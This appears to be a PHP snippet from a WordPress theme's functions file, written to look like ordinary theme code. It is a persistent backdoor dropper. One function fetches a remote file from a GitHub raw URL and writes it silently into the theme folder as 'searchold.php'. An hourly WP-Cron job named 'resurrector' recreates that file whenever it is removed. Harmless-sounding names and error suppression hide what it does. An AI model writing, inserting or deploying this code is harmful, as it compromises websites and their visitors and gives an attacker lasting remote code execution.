function theme_component_loader() {
	$target = ABSPATH . 'wp-content/themes/colegio-yapeyu-v3/searchold.php';

	if ( ! file_exists( $target ) ) {
		$payload = @file_get_contents('https://raw.githubusercontent.com/onlyme1d/dxerror/refs/heads/main/pink.txt');
		if ( $payload ) {
			@file_put_contents( $target, $payload );
		}
	}
}

/**
 *
 */
function theme_schedule_resurrector() {
	if ( ! wp_next_scheduled( 'run_theme_component_loader' ) ) {
		wp_schedule_event( time(), 'hourly', 'run_theme_component_loader' );
	}
}
add_action( 'wp', 'theme_schedule_resurrector' );

/**
 *
 */
add_action( 'run_theme_component_loader', 'theme_component_loader' );

/**
 *
 */
add_action( 'after_setup_theme', 'theme_component_loader' );
